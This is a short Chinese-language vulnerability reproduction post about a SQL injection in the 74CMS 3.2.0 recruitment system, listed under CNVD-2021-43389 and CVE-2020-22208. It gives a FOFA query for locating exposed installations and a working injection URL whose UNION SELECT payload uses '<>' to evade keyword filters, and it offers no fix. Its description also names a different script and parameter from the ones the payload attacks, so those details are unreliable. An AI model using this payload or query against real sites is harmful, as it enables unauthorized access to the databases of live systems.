文章目录
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
1.74CMS(骑士CMS)简介
微信公众号搜索:南风漏洞复现文库
南风网络安全公众号首发
74CMS是太原迅易科技有限公司基于ThinkPHP框架二次开发的人才招聘系统。
2.漏洞描述
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
CNVD-2021-43389
CVE-2020-22208
CNNVD-202106-1336
3.影响版本
74CMS 3.2.0
4.fofa查询语句
app=“骑士-74CMS”
5.漏洞复现
http://192.168.31.246:3003/plus/ajax_officebuilding.php?act=key&key=錦’ a<>nd 1=2 un<>ion sel<>ect 1,2,3,version(),5,6,7,8,9%